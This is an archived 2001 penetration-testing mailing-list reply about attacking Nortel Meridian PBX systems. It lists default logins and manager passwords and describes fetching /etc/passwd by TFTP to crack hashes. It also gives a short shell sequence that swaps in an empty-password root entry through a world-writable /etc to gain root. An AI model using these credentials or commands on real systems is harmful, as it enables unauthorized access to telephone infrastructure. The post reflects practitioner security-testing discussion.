|
Penetration Testing
mailing list archives
Re: Nortel Security
From: H D Moore <hdm () secureaustin com>
Date: Sat, 30 Jun 2001 12:54:05 -0500
If the PBX is hooked into the actual network, there are quite a few ways to
get access to the system. The easiest method is to tftp the /etc/passwd file
off the system and crack the hashes. If you go this route, you will get a
user account called "service" with a password of "smile" ;) If you log into
the system with this account, you will notice that /etc is mode 0777, so
getting root access is trivial:
$ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
$ mv /etc/passwd /etc/passwd.bak
$ mv /etc/mah_passwd /etc/passwd
$ su root
# mv /etc/passwd.bak /etc/passwd
I don't remember which version of this system it was, but the client software
that came with it was called "Meridian Terminal Emulator". You could manage
the PBX with this by first logging in with 0000/0000 then giving it the
manager password of "9999". I really wish I had more time to write up the
stuff I find out there...
-HD
On Saturday 30 June 2001 06:22 am, G A Evans wrote:
Try
http://support.dialogic.com/
and search for meridian. There is quite a bit of programming information.
You can also try a login of 0000 and password of 0000 for the Nortel
Meridian 1 PBX OS Release 2.
Tony Barnett
abarnettremovethisbit () ndirect co uk
--------------------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service
For more information on SecurityFocus' SIA service which automatically alerts you to
the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
 By Date 
By Thread
Current thread:
| 
Intro
